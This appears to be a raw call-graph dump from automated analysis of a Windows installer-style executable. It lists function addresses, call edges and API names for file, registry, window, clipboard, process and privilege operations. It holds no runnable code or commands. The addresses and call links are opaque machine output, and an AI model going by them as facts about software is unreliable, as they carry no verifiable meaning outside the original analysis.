4767->4862 4768 700b182d 4771 700b187e 4768->4771 4772 700b1833 4768->4772 4769 700b17f8 4786 700b17ee 4769->4786 4859 700b2d83 4769->4859 4770 700b17df 4774 700b17e5 4770->4774 4780 700b17f0 4770->4780 4778 700b25b5 10 API calls 4771->4778 4881 700b15c6 4772->4881 4774->4786 4843 700b2af8 4774->4843 4787 700b186f 4778->4787 4779 700b1815 4873 700b15b4 4779->4873 4853 700b2770 4780->4853 4784 700b17f6 4784->4786 4785 700b25b5 10 API calls 4785->4787 4786->4767 4786->4768 4790 700b18c5 4787->4790 4887 700b2578 4787->4887 4790->4760 4792 700b18cf GlobalFree 4790->4792 4792->4760 4795 700b18b1 4795->4790 4891 700b153d wsprintfW 4795->4891 4796 700b18aa FreeLibrary 4796->4795 4798->4753 4894 700b121b GlobalAlloc 4799->4894 4801 700b1b86 4895 700b121b GlobalAlloc 4801->4895 4803 700b1dcb GlobalFree GlobalFree GlobalFree 4804 700b1de8 4803->4804 4815 700b1e32 4803->4815 4806 700b21de 4804->4806 4812 700b1dfd 4804->4812 4804->4815 4805 700b1c86 GlobalAlloc 4825 700b1b91 4805->4825 4807 700b2200 GetModuleHandleW 4806->4807 4806->4815 4808 700b2211 LoadLibraryW 4807->4808 4809 700b2226 4807->4809 4808->4809 4808->4815 4902 700b161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4809->4902 4810 700b1cd1 lstrcpyW 4814 700b1cdb lstrcpyW 4810->4814 4811 700b1cef GlobalFree 4811->4825 4812->4815 4898 700b122c 4812->4898 4814->4825 4815->4759 4816 700b2278 4816->4815 4820 700b2285 lstrlenW 4816->4820 4817 700b2086 4901 700b121b GlobalAlloc 4817->4901 4903 700b161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4820->4903 4821 700b1fc7 GlobalFree 4821->4825 4822 700b210e 4822->4815 4830 700b2176 lstrcpyW 4822->4830 4823 700b2238 4823->4816 4831 700b2262 GetProcAddress 4823->4831 4825->4803 4825->4805 4825->4810 4825->4811 4825->4814 4825->4815 4825->4817 4825->4821 4825->4822 4826 700b1d2d 4825->4826 4828 700b122c 2 API calls 4825->4828 4826->4825 4896 700b158f GlobalSize GlobalAlloc 4826->4896 4827 700b229f 4827->4815 4828->4825 4830->4815 4831->4816 4832 700b208f 4832->4759 4834 700b23f8 4833->4834 4836 700b2521 GlobalFree 4834->4836 4838 700b24cb GlobalAlloc CLSIDFromString 4834->4838 4839 700b24a0 GlobalAlloc WideCharToMultiByte 4834->4839 4840 700b122c GlobalAlloc lstrcpynW 4834->4840 4841 700b24ea 4834->4841 4905 700b12ba 4834->4905 4836->4834 4837 700b17cf 4836->4837 4837->4769 4837->4770 4837->4786 4838->4836 4839->4836 4840->4834 4841->4836 4909 700b2704 4841->4909 4845 700b2b0a 4843->4845 4844 700b2baf ReadFile 4848 700b2bcd 4844->4848 4845->4844 4847 700b2c99 4847->4786 4912 700b2aa2 4848->4912 4850 700b23b3 4849->4850 4851 700b23be GlobalAlloc 4850->4851 4852 700b17c8 4850->4852 4851->4850 4852->4761 4857 700b27a0 4853->4857 4854 700b283b GlobalAlloc 4858 700b285e 4854->4858 4855 700b284e 4856 700b2854 GlobalSize 4855->4856 4855->4858 4856->4858 4857->4854 4857->4855 4858->4784 4861 700b2d8e 4859->4861 4860 700b2dce GlobalFree 4861->4860 4916 700b121b GlobalAlloc 4862->4916 4864 700b25bf 4865 700b266b lstrcpynW 4864->4865 4866 700b265a StringFromGUID2 4864->4866 4867 700b2638 MultiByteToWideChar 4864->4867 4868 700b267e wsprintfW 4864->4868 4869 700b26a2 GlobalFree 4864->4869 4870 700b26d7 GlobalFree 4864->4870 4871 700b1272 2 API calls 4864->4871 4917 700b12e1 4864->4917 4865->4864 4866->4864 4867->4864 4868->4864 4869->4864 4870->4779 4871->4864 4921 700b121b GlobalAlloc 4873->4921 4875 700b15b9 4876 700b15c6 2 API calls 4875->4876 4877 700b15c3 4876->4877 4878 700b1272 4877->4878 4879 700b127b GlobalAlloc lstrcpynW 4878->4879 4880 700b12b5 GlobalFree 4878->4880 4879->4880 4880->4787 4883 700b15d2 wsprintfW 4881->4883 4884 700b15ff lstrcpyW 4881->4884 4886 700b1618 4883->4886 4884->4886 4886->4785 4888 700b2586 4887->4888 4890 700b1891 4887->4890 4889 700b25a2 GlobalFree 4888->4889 4888->4890 4889->4888 4890->4795 4890->4796 4892 700b1272 2 API calls 4891->4892 4893 700b155e 4892->4893 4893->4790 4894->4801 4895->4825 4897 700b15ad 4896->4897 4897->4826 4904 700b121b GlobalAlloc 4898->4904 4900 700b123b lstrcpynW 4900->4815 4901->4832 4902->4823 4903->4827 4904->4900 4906 700b12c1 4905->4906 4907 700b122c 2 API calls 4906->4907 4908 700b12df 4907->4908 4908->4834 4910 700b2768 4909->4910 4911 700b2712 VirtualAlloc 4909->4911 4910->4841 4911->4910 4913 700b2aad 4912->4913 4914 700b2abd 4913->4914 4915 700b2ab2 GetLastError 4913->4915 4914->4847 4915->4914 4916->4864 4918 700b12ea 4917->4918 4919 700b130c 4917->4919 4918->4919 4920 700b12f0 lstrcpyW 4918->4920 4919->4864 4920->4919 4921->4875 5156 4028d5 5157 4028dd 5156->5157 5158 4028e1 FindNextFileW 5157->5158 5161 4028f3 5157->5161 5159 40293a 5158->5159 5158->5161 5162 4063ee lstrcpynW 5159->5162 5162->5161 5163 401956 5164 402d3e 17 API calls 5163->5164 5165 40195d lstrlenW 5164->5165 5166 402630 5165->5166 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 4988 40175c 4989 402d3e 17 API calls 4988->4989 4990 401763 4989->4990 4991 405f13 2 API calls 4990->4991 4992 40176a 4991->4992 4993 405f13 2 API calls 4992->4993 4993->4992 5167 401d5d 5168 402d1c 17 API calls 5167->5168 5169 401d6e SetWindowLongW 5168->5169 5170 402bc2 5169->5170 4994 401ede 4995 402d1c 17 API calls 4994->4995 4996 401ee4 4995->4996 4997 402d1c 17 API calls 4996->4997 4998 401ef0 4997->4998 4999 401f07 EnableWindow 4998->4999 5000 401efc ShowWindow 4998->5000 5001 402bc2 4999->5001 5000->5001 5171 401563 5172 402b08 5171->5172 5175 406335 wsprintfW 5172->5175 5174 402b0d 5175->5174 5176 4026e4 5177 402d1c 17 API calls 5176->5177 5178 4026f3 5177->5178 5179 40273d ReadFile 5178->5179 5180 405f67 ReadFile 5178->5180 5181 402832 5178->5181 5182 40277d MultiByteToWideChar 5178->5182 5185 4027a3 SetFilePointer MultiByteToWideChar 5178->5185 5186 402843 5178->5186 5188 402830 5178->5188 5189 405fc5 SetFilePointer 5178->5189 5179->5178 5179->5188 5180->5178 5198 406335 wsprintfW 5181->5198 5182->5178 5185->5178 5187 402864 SetFilePointer 5186->5187 5186->5188 5187->5188 5190 405ff9 5189->5190 5191 405fe1 5189->5191 5190->5178 5192 405f67 ReadFile 5191->5192 5193 405fed 5192->5193 5193->5190 5194 406002 SetFilePointer 5193->5194 5195 40602a SetFilePointer 5193->5195 5194->5195 5196 40600d 5194->5196 5195->5190 5197 405f96 WriteFile 5196->5197 5197->5190 5198->5188 5199 700b2ca3 5200 700b2cbb 5199->5200 5201 700b158f 2 API calls 5200->5201 5202 700b2cd6 5201->5202 5203 401968 5204 402d1c 17 API calls 5203->5204 5205 40196f 5204->5205 5206 402d1c 17 API calls 5205->5206 5207 40197c 5206->5207 5208 402d3e 17 API calls 5207->5208 5209 401993 lstrlenW 5208->5209 5210 4019a4 5209->5210 5211 4019e5 5210->5211 5215 4063ee lstrcpynW 5210->5215 5213 4019d5 5213->5211 5214 4019da lstrlenW 5213->5214 5214->5211 5215->5213 5216 40166a 5217 402d3e 17 API calls 5216->5217 5218 401670 5217->5218 5219 40674c 2 API calls 5218->5219 5220 401676 5219->5220 4562 403e6b 4563 403e83 4562->4563 4564 403fbe 4562->4564 4563->4564 4565 403e8f 4563->4565 4566 403fcf GetDlgItem GetDlgItem 4564->4566 4571 40400f 4564->4571 4568 403e9a SetWindowPos 4565->4568 4569 403ead 4565->4569 4570 404344 18 API calls 4566->4570 4567 404069 4572 404390 SendMessageW 4567->4572 4583 403fb9 4567->4583 4568->4569 4573 403eb2 ShowWindow 4569->4573 4574 403eca 4569->4574 4575 403ff9 SetClassLongW 4570->4575 4571->4567 4576 401389 2 API calls 4571->4576 4601 40407b 4572->4601 4573->4574 4577 403ed2 DestroyWindow 4574->4577 4578 403eec 4574->4578 4579 40140b 2 API calls 4575->4579 4582 404041 4576->4582 4584 4042cd 4577->4584 4580 403ef1 SetWindowLongW 4578->4580 4581 403f02 4578->4581 4579->4571 4580->4583 4585 403fab 4581->4585 4586 403f0e GetDlgItem 4581->4586 4582->4567 4587 404045 SendMessageW 4582->4587 4584->4583 4593 4042fe ShowWindow 4584->4593 4642 4043ab 4585->4642 4590 403f21 SendMessageW IsWindowEnabled 4586->4590 4591 403f3e 4586->4591 4587->4583 4588 40140b 2 API calls 4588->4601 4589 4042cf DestroyWindow EndDialog 4589->4584 4590->4583 4590->4591 4595 403f4b 4591->4595 4598 403f92 SendMessageW 4591->4598 4599 403f5e 4591->4599 4607 403f43 4591->4607 4593->4583 4594 40642b 17 API calls 4594->4601 4595->4598 4595->4607 4597 404344 18 API calls 4597->4601 4598->4585 4602 403f66 4599->4602 4603 403f7b 4599->4603 4600 403f79 4600->4585 4601->4583 4601->4588 4601->4589 4601->4594 4601->4597 4624 40420f DestroyWindow 4601->4624 4633 404344 4601->4633 4605 40140b 2 API calls 4602->4605 4604 40140b 2 API calls 4603->4604 4606 403f82 4604->4606 4605->4607 4606->4585 4606->4607 4639 40431d 4607->4639 4609 4040f6 GetDlgItem 4610 404113 ShowWindow KiUserCallbackDispatcher 4609->4610 4611 40410b 4609->4611 4636 404366 KiUserCallbackDispatcher 4610->4636 4611->4610 4613 40413d EnableWindow 4618 404151 4613->4618 4614 404156 GetSystemMenu EnableMenuItem SendMessageW 4615 404186 SendMessageW 4614->4615 4614->4618 4615->4618 4617 403e4c 18 API calls 4617->4618 4618->4614 4618->4617 4637 404379 SendMessageW 4618->4637 4638 4063ee lstrcpynW 4618->4638 4620 4041b5 lstrlenW 4621 40642b 17 API calls 4620->4621 4622 4041cb SetWindowTextW 4621->4622 4623 401389 2 API calls 4622->4623 4623->4601 4624->4584 4625 404229 CreateDialogParamW 4624->4625 4625->4584 4626 40425c 4625->4626 4627 404344 18 API calls 4626->4627 4628 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4627->4628 4629 401389 2 API calls 4628->4629 4630 4042ad 4629->4630 4630->4583 4631 4042b5 ShowWindow 4630->4631 4632 404390 SendMessageW 4631->4632 4632->4584 4634 40642b 17 API calls 4633->4634 4635 40434f SetDlgItemTextW 4634->4635 4635->4609 4636->4613 4637->4618 4638->4620 4640 404324 4639->4640 4641 40432a SendMessageW 4639->4641 4640->4641 4641->4600 4643 40446e 4642->4643 4644 4043c3 GetWindowLongW 4642->4644 4643->4583 4644->4643 4645 4043d8 4644->4645 4645->4643 4646 404405 GetSysColor 4645->4646 4647 404408 4645->4647 4646->4647 4648 404418 SetBkMode 4647->4648 4649 40440e SetTextColor 4647->4649 4650 404430 GetSysColor 4648->4650 4651 404436 4648->4651 4649->4648 4650->4651 4652 404447 4651->4652 4653 40443d SetBkColor 4651->4653 4652->4643 4654 404461 CreateBrushIndirect 4652->4654 4655 40445a DeleteObject 4652->4655 4653->4652 4654->4643 4655->4654 5221 4023ec 5222 402d3e 17 API calls 5221->5222 5223 4023fb 5222->5223 5224 402d3e 17 API calls 5223->5224 5225 402404 5224->5225 5226 402d3e 17 API calls 5225->5226 5227 40240e GetPrivateProfileStringW 5226->5227 5228 4047ee 5229 404824 5228->5229 5230 4047fe 5228->5230 5231 4043ab 8 API calls 5229->5231 5232 404344 18 API calls 5230->5232 5234 404830 5231->5234 5233 40480b SetDlgItemTextW 5232->5233 5233->5229 4687 40176f 4688 402d3e 17 API calls 4687->4688 4689 401776 4688->4689 4690 401796 4689->4690 4691 40179e 4689->4691 4726 4063ee lstrcpynW 4690->4726 4727 4063ee lstrcpynW 4691->4727 4694 40179c 4698 40669d 5 API calls 4694->4698 4695 4017a9 4696 405cc3 3 API calls 4695->4696 4697 4017af lstrcatW 4696->4697 4697->4694 4708 4017bb 4698->4708 4699 40674c 2 API calls 4699->4708 4700 405ebf 2 API calls 4700->4708 4702 4017cd CompareFileTime 4702->4708 4703 40188d 4704 405456 24 API calls 4703->4704 4707 401897 4704->4707 4705 405456 24 API calls 4713 401879 4705->4713 4706 4063ee lstrcpynW 4706->4708 4709 40324c 31 API calls 4707->4709 4708->4699 4708->4700 4708->4702 4708->4703 4708->4706 4714 40642b 17 API calls 4708->4714 4722 405a54 MessageBoxIndirectW 4708->4722 4723 401864 4708->4723 4725 405ee4 GetFileAttributesW CreateFileW 4708->4725 4710 4018aa 4709->4710 4711 4018be SetFileTime 4710->4711 4712 4018d0 CloseHandle 4710->4712 4711->4712 4712->4713 4715 4018e1 4712->4715 4714->4708 4716 4018e6 4715->4716 4717 4018f9 4715->4717 4718 40642b 17 API calls 4716->4718 4719 40642b 17 API calls 4717->4719 4720 4018ee lstrcatW 4718->4720 4721 401901 4719->4721 4720->4721 4721->4713 4724 405a54 MessageBoxIndirectW 4721->4724 4722->4708 4723->4705 4723->4713 4724->4713 4725->4708 4726->4694 4727->4695 5235 401a72 5236 402d1c 17 API calls 5235->5236 5237 401a7b 5236->5237 5238 402d1c 17 API calls 5237->5238 5239 401a20 5238->5239 4922 401573 4923 401583 ShowWindow 4922->4923 4924 40158c 4922->4924 4923->4924 4925 402bc2 4924->4925 4926 40159a ShowWindow 4924->4926 4926->4925 5240 4014f5 SetForegroundWindow 5241 402bc2 5240->5241 5242 700b103d 5243 700b101b 5 API calls 5242->5243 5244 700b1056 5243->5244 5245 401ff6 5246 402d3e 17 API calls 5245->5246 5247 401ffd 5246->5247 5248 40674c 2 API calls 5247->5248 5249 402003 5248->5249 5251 402014 5249->5251 5252 406335 wsprintfW 5249->5252 5252->5251 5253 4022f7 5254 402d3e 17 API calls 5253->5254 5255 4022fd 5254->5255 5256 402d3e 17 API calls 5255->5256 5257 402306 5256->5257 5258 402d3e 17 API calls 5257->5258 5259 40230f 5258->5259 5260 40674c 2 API calls 5259->5260 5261 402318 5260->5261 5262 402329 lstrlenW lstrlenW 5261->5262 5266 40231c 5261->5266 5264 405456 24 API calls 5262->5264 5263 405456 24 API calls 5267 402324 5263->5267 5265 402367 SHFileOperationW 5264->5265 5265->5266 5265->5267 5266->5263 5266->5267 5268 401b77 5269 402d3e 17 API calls 5268->5269 5270 401b7e 5269->5270 5271 402d1c 17 API calls 5270->5271 5272 401b87 wsprintfW 5271->5272 5273 402bc2 5272->5273 5274 40447a lstrcpynW lstrlenW 5275 40167b 5276 402d3e 17 API calls 5275->5276 5277 401682 5276->5277 5278 402d3e 17 API calls 5277->5278 5279 40168b 5278->5279 5280 402d3e 17 API calls 5279->5280 5281 401694 MoveFileW 5280->5281 5282 4016a7 5281->5282 5288 4016a0 5281->5288 5283 40674c 2 API calls 5282->5283 5286 4022ee 5282->5286 5285 4016b6 5283->5285 5284 401423 24 API calls 5284->5286 5285->5286 5287 4061b4 36 API calls 5285->5287 5287->5288 5288->5284 5289 403a7b 5290 403a86 5289->5290 5291 403a8d GlobalAlloc 5290->5291 5292 403a8a 5290->5292 5291->5292 5293 40237b 5294 402382 5293->5294 5297 402395 5293->5297 5295 40642b 17 API calls 5294->5295 5296 40238f 5295->5296 5296->5297 5298 405a54 MessageBoxIndirectW 5296->5298 5298->5297 5299 4019ff 5300 402d3e 17 API calls 5299->5300 5301 401a06 5300->5301 5302 402d3e 17 API calls 5301->5302 5303 401a0f 5302->5303 5304 401a16 lstrcmpiW 5303->5304 5305 401a28 lstrcmpW 5303->5305 5306 401a1c 5304->5306 5305->5306 5307 401000 5308 401037 BeginPaint GetClientRect 5307->5308 5309 40100c DefWindowProcW 5307->5309 5311 4010f3 5308->5311 5312 401179 5309->5312 5313 401073 CreateBrushIndirect FillRect DeleteObject 5311->5313 5314 4010fc 5311->5314 5313->5311 5315 401102 CreateFontIndirectW 5314->5315 5316 401167 EndPaint 5314->5316 5315->5316 5317 401112 6 API calls 5315->5317 5316->5312 5317->5316 5318 401d81 5319 401d94 GetDlgItem 5318->5319 5320 401d87 5318->5320 5322 401d8e 5319->5322 5321 402d1c 17 API calls 5320->5321 5321->5322 5323 401dd5 GetClientRect LoadImageW SendMessageW 5322->5323 5325 402d3e 17 API calls 5322->5325 5326 401e33 5323->5326 5328 401e3f 5323->5328 5325->5323 5327 401e38 DeleteObject 5326->5327 5326->5328 5327->5328 5329 402482 5330 402d3e 17 API calls 5329->5330 5331 402494 5330->5331 5332 402d3e 17 API calls 5331->5332 5333 40249e 5332->5333 5346 402dce 5333->5346 5336 402bc2 5337 4024d6 5340 402d1c 17 API calls 5337->5340 5342 4024e2 5337->5342 5338 402d3e 17 API calls 5339 4024cc lstrlenW 5338->5339 5339->5337 5340->5342 5341 402501 RegSetValueExW 5344 402517 RegCloseKey 5341->5344 5342->5341 5343 40324c 31 API calls 5342->5343 5343->5341 5344->5336 5347 402de9 5346->5347 5350 406289 5347->5350 5351 406298 5350->5351 5352 4062a3 RegCreateKeyExW 5351->5352 5353 4024ae 5351->5353 5352->5353 5353->5336 5353->5337 5353->5338 5354 700b2349 5355 700b23b3 5354->5355 5356 700b23be GlobalAlloc 5355->5356 5357 700b23dd 5355->5357 5356->5355 5358 402902 5359 402d3e 17 API calls 5358->5359 5360 402909 FindFirstFileW 5359->5360 5361 402931 5360->5361 5364 40291c 5360->5364 5362 40293a 5361->5362 5366 406335 wsprintfW 5361->5366 5367 4063ee lstrcpynW 5362->5367 5366->5362 5367->5364 5368 401503 5369 40150b 5368->5369 5370 40151e 5368->5370 5371 402d1c 17 API calls 5369->5371 5371->5370 5372 404503 5373 404635 5372->5373 5374 40451b 5372->5374 5375 40469f 5373->5375 5376 404769 5373->5376 5381 404670 GetDlgItem SendMessageW 5373->5381 5378 404344 18 API calls 5374->5378 5375->5376 5377 4046a9 GetDlgItem 5375->5377 5383 4043ab 8 API calls 5376->5383 5379 4046c3 5377->5379 5380 40472a 5377->5380 5382 404582 5378->5382 5379->5380 5388 4046e9 SendMessageW LoadCursorW SetCursor 5379->5388 5380->5376 5384 40473c 5380->5384 5405 404366 KiUserCallbackDispatcher 5381->5405 5386 404344 18 API calls 5382->5386 5387 404764 5383->5387 5389 404752 5384->5389 5390 404742 SendMessageW 5384->5390 5392 40458f CheckDlgButton 5386->5392 5409 4047b2 5388->5409 5389->5387 5394 404758 SendMessageW 5389->5394 5390->5389 5391 40469a 5406 40478e 5391->5406 5403 404366 KiUserCallbackDispatcher 5392->5403 5394->5387 5398 4045ad GetDlgItem 5404 404379 SendMessageW 5398->5404 5400 4045c3 SendMessageW 5401 4045e0 GetSysColor 5400->5401 5402 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5400->5402 5401->5402 5402->5387 5403->5398 5404->5400 5405->5391 5407 4047a1 SendMessageW 5406->5407 5408 40479c 5406->5408 5407->5375 5408->5407 5412 405a1a ShellExecuteExW 5409->5412 5411 404718 LoadCursorW SetCursor 5411->5380 5412->5411 5413 402889 5414 402890 5413->5414 5416 402b0d 5413->5416 5415 402d1c 17 API calls 5414->5415 5417 402897 5415->5417 5418 4028a6 SetFilePointer 5417->5418 5418->5416 5419 4028b6 5418->5419 5421 406335 wsprintfW 5419->5421 5421->5416 5422 404b8b 5423 404bb7 5422->5423 5424 404b9b 5422->5424 5426 404bea 5423->5426 5427 404bbd SHGetPathFromIDListW 5423->5427 5433 405a38 GetDlgItemTextW 5424->5433 5429 404bd4 SendMessageW 5427->5429 5430 404bcd 5427->5430 5428 404ba8 SendMessageW 5428->5423 5429->5426 5432 40140b 2 API calls 5430->5432 5432->5429 5433->5428 5434 40190c 5435 401943 5434->5435 5436 402d3e 17 API calls 5435->5436 5437 401948 5436->5437 5438 405b00 67 API calls 5437->5438 5439 401951 5438->5439 5440 40190f 5441 402d3e 17 API calls 5440->5441 5442 401916 5441->5442 5443 405a54 MessageBoxIndirectW 5442->5443 5444 40191f 5443->5444 5445 401491 5446 405456 24 API calls 5445->5446 5447 401498 5446->5447 5448 700b18d9 5449 700b18fc 5448->5449 5450 700b1931 GlobalFree 5449->5450 5451 700b1943 5449->5451 5450->5451 5452 700b1272 2 API calls 5451->5452 5453 700b1ace GlobalFree GlobalFree 5452->5453 5454 401f12 5455 402d3e 17 API calls 5454->5455 5456 401f18 5455->5456 5457 402d3e 17 API calls 5456->5457 5458 401f21 5457->5458 5459 402d3e 17 API calls 5458->5459 5460 401f2a 5459->5460 5461 402d3e 17 API calls 5460->5461 5462 401f33 5461->5462 5463 401423 24 API calls 5462->5463 5464 401f3a 5463->5464 5471 405a1a ShellExecuteExW 5464->5471 5466 401f82 5469 402925 5466->5469 5472 40688e WaitForSingleObject 5466->5472 5468 401f9f CloseHandle 5468->5469 5471->5466 5473 4068a8 5472->5473 5474 4068ba GetExitCodeProcess 5473->5474 5475 40681f 2 API calls 5473->5475 5474->5468 5476 4068af WaitForSingleObject 5475->5476 5476->5473 5477 700b1058 5479 700b1074 5477->5479 5478 700b10dd 5479->5478 5480 700b1516 GlobalFree 5479->5480 5481 700b1092 5479->5481 5480->5481 5482 700b1516 GlobalFree 5481->5482 5483 700b10a2 5482->5483 5484 700b10a9 GlobalSize 5483->5484 5485 700b10b2 5483->5485 5484->5485 5486 700b10b6 GlobalAlloc 5485->5486 5488 700b10c7 5485->5488 5487 700b153d 3 API calls 5486->5487 5487->5488 5489 700b10d2 GlobalFree 5488->5489 5489->5478 4927 700b29df 4928 700b2a2f 4927->4928 4929 700b29ef VirtualProtect 4927->4929 4929->4928 5490 402614 5491 402d3e 17 API calls 5490->5491 5492 40261b 5491->5492 5495 405ee4 GetFileAttributesW CreateFileW 5492->5495 5494 402627 5495->5494 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4938 4057c0 4934->4938 4939 405787 ShowWindow ShowWindow 4934->4939 4935->4934 4979 405529 5 API calls 4935->4979 4936 405626 4942 40562d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4936->4942 4940 4057a7 4937->4940 4941 4057fb 4937->4941 4946 4043ab 8 API calls 4938->4946 4978 404379 SendMessageW 4939->4978 4944 4057d5 ShowWindow 4940->4944 4945 4057af 4940->4945 4941->4938 4951 405809 SendMessageW 4941->4951 4949 40569b 4942->4949 4950 40567f SendMessageW SendMessageW 4942->4950 4947 4057f5 4944->4947 4948 4057e7 4944->4948 4952 40431d SendMessageW 4945->4952 4953 4057ce 4946->4953 4955 40431d SendMessageW 4947->4955 4954 405456 24 API calls 4948->4954 4956 4056a0 SendMessageW 4949->4956 4957 4056ae 4949->4957 4950->4949 4951->4953 4958 405822 CreatePopupMenu 4951->4958 4952->4938 4954->4947 4955->4941 4956->4957 4960 404344 18 API calls 4957->4960 4959 40642b 17 API calls 4958->4959 4961 405832 AppendMenuW 4959->4961 4962 4056be 4960->4962 4963 405862 TrackPopupMenu 4961->4963 4964 40584f GetWindowRect 4961->4964 4965 4056c7 ShowWindow 4962->4965 4966 4056fb GetDlgItem SendMessageW 4962->4966 4963->4953 4968 40587d 4963->4968 4964->4963 4969 4056ea 4965->4969 4970 4056dd ShowWindow 4965->4970 4966->4953 4967 405722 SendMessageW SendMessageW 4966->4967 4967->4953 4971 405899 SendMessageW 4968->4971 4977 404379 SendMessageW 4969->4977 4970->4969 4971->4971 4972 4058b6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4971->4972 4974 4058db SendMessageW 4972->4974 4974->4974 4975 405904 GlobalUnlock SetClipboardData CloseClipboard 4974->4975 4975->4953 4976->4936 4977->4966 4978->4937 5496 402596 5497 402d7e 17 API calls 5496->5497 5498 4025a0 5497->5498 5499 402d1c 17 API calls 5498->5499 5500 4025a9 5499->5500 5501 4025d1 RegEnumValueW 5500->5501 5502 4025c5 RegEnumKeyW 5500->5502 5504 402925 5500->5504 5503 4025e6 RegCloseKey 5501->5503 5502->5503 5503->5504 5506 401d17 5507 402d1c 17 API calls 5506->5507 5508 401d1d IsWindow 5507->5508 5509 401a20 5508->5509 5510 401b9b 5511 401bec 5510->5511 5516 401ba8 5510->5516 5512 401bf1 5511->5512 5513 401c16 GlobalAlloc 5511->5513 5523 402395 5512->5523 5531 4063ee lstrcpynW 5512->5531 5515 40642b 17 API calls 5513->5515 5514 40642b 17 API calls 5517 40238f 5514->5517 5519 401c31 5515->5519 5516->5519 5520 401bbf 5516->5520 5517->5523 5524 405a54 MessageBoxIndirectW 5517->5524 5519->5514 5519->5523 5529 4063ee lstrcpynW 5520->5529 5521 401c03 GlobalFree 5521->5523 5524->5523 5525 401bce 5530 4063ee lstrcpynW 5525->5530 5527 401bdd 5532 4063ee lstrcpynW 5527->5532 5529->5525 5530->5527 5531->5521 5532->5523 5533 402b9d SendMessageW 5534 402bc2 5533->5534 5535 402bb7 InvalidateRect 5533->5535 5535->5534 5536 40149e 5537 402395 5536->5537 5538 4014ac PostQuitMessage 5536->5538 5538->5537 5539 700b16d4 5540 700b1703 5539->5540 5541 700b1b5f 22 API calls 5540->5541 5542 700b170a 5541->5542 5543 700b171d 5542->5543 5544 700b1711 5542->5544 5546 700b1727 5543->5546 5547 700b1744 5543->5547 5545 700b1272 2 API calls 5544->5545 5550 700b171b 5545->5550 5551 700b153d 3 API calls 5546->5551 5548 700b174a 5547->5548 5549 700b176e 5547->5549 5553 700b15b4 3 API calls 5548->5553 5554 700b153d 3 API calls 5549->5554 5552 700b172c 5551->5552 5555 700b15b4 3 API calls 5552->5555 5556 700b174f 5553->5556 5554->5550 5557 700b1732 5555->5557 5558 700b1272 2 API calls 5556->5558 5559 700b1272 2 API calls 5557->5559 5560 700b1755 GlobalFree 5558->5560 5561 700b1738 GlobalFree 5559->5561 5560->5550 5562 700b1769 GlobalFree 5560->5562 5561->5550 5562->5550 4257 4034a2 SetErrorMode GetVersion 4258 4034e1 4257->4258 4259 4034e7 4257->4259 4260 4067e3 5 API calls 4258->4260 4261 406773 3 API calls 4259->4261 4260->4259 4262 4034fd lstrlenA 4261->4262 4262->4259 4263 40350d 4262->4263 4264 4067e3 5 API calls 4263->4264 4265 403514 4264->4265 4266 4067e3 5 API calls 4265->4266 4267 40351b 4266->4267 4268 4067e3 5 API calls 4267->4268 4269 403527 #17 OleInitialize SHGetFileInfoW 4268->4269 4347 4063ee lstrcpynW 4269->4347 4272 403573 GetCommandLineW 4348 4063ee lstrcpynW 4272->4348 4274 403585 4275 405cf0 CharNextW 4274->4275 4276 4035aa CharNextW 4275->4276 4277 4036d4 GetTempPathW 4276->4277 4284 4035c3 4276->4284 4349 403471 4277->4349 4279 4036ec 4280 4036f0 GetWindowsDirectoryW lstrcatW 4279->4280 4281 403746 DeleteFileW 4279->4281 4285 403471 12 API calls 4280->4285 4359 403015 GetTickCount GetModuleFileNameW 4281->4359 4282 405cf0 CharNextW 4282->4284 4284->4282 4290 4036bf 4284->4290 4291 4036bd 4284->4291 4286 40370c 4285->4286 4286->4281 4288 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4286->4288 4287 40375a 4295 405cf0 CharNextW 4287->4295 4329 4037fd 4287->4329 4342 40380d 4287->4342 4289 403471 12 API calls 4288->4289 4293 40373e 4289->4293 4443 4063ee lstrcpynW 4290->4443 4291->4277 4293->4281 4293->4342 4312 403779 4295->4312 4298 403947 4301 4039cb ExitProcess 4298->4301 4302 40394f GetCurrentProcess OpenProcessToken 4298->4302 4299 403827 4453 405a54 4299->4453 4307 403967 LookupPrivilegeValueW AdjustTokenPrivileges 4302->4307 4308 40399b 4302->4308 4305 4037d7 4309 405dcb 18 API calls 4305->4309 4306 40383d 4310 4059bf 5 API calls 4306->4310 4307->4308 4311 4067e3 5 API calls 4308->4311 4313 4037e3 4309->4313 4314 403842 lstrcatW 4310->4314 4324 4039a2 4311->4324 4312->4305 4312->4306 4313->4342 4444 4063ee lstrcpynW 4313->4444 4315 403853 lstrcatW 4314->4315 4316 40385e lstrcatW lstrcmpiW 4314->4316 4315->4316 4319 40387a 4316->4319 4316->4342 4317 4039b7 ExitWindowsEx 4317->4301 4320 4039c4 4317->4320 4322 403886 4319->4322 4323 40387f 4319->4323 4462 40140b 4320->4462 4321 4037f2 4445 4063ee lstrcpynW 4321->4445 4328 4059a2 2 API calls 4322->4328 4327 405925 4 API calls 4323->4327 4324->4317 4324->4320 4330 403884 4327->4330 4331 40388b SetCurrentDirectoryW 4328->4331 4387 403abd 4329->4387 4330->4331 4332 4038a6 4331->4332 4333 40389b 4331->4333 4458 4063ee lstrcpynW 4332->4458 4457 4063ee lstrcpynW 4333->4457 4336 40642b 17 API calls 4337 4038e5 DeleteFileW 4336->4337 4338 4038f2 CopyFileW 4337->4338 4344 4038b4 4337->4344 4338->4344 4339 40393b 4340 4061b4 36 API calls 4339->4340 4340->4342 4341 4061b4 36 API calls 4341->4344 4446 4039e3 4342->4446 4343 40642b 17 API calls 4343->4344 4344->4336 4344->4339 4344->4341 4344->4343 4346 403926 CloseHandle 4344->4346 4459 4059d7 CreateProcessW 4344->4459 4346->4344 4347->4272 4348->4274 4350 40669d 5 API calls 4349->4350 4352 40347d 4350->4352 4351 403487 4351->4279 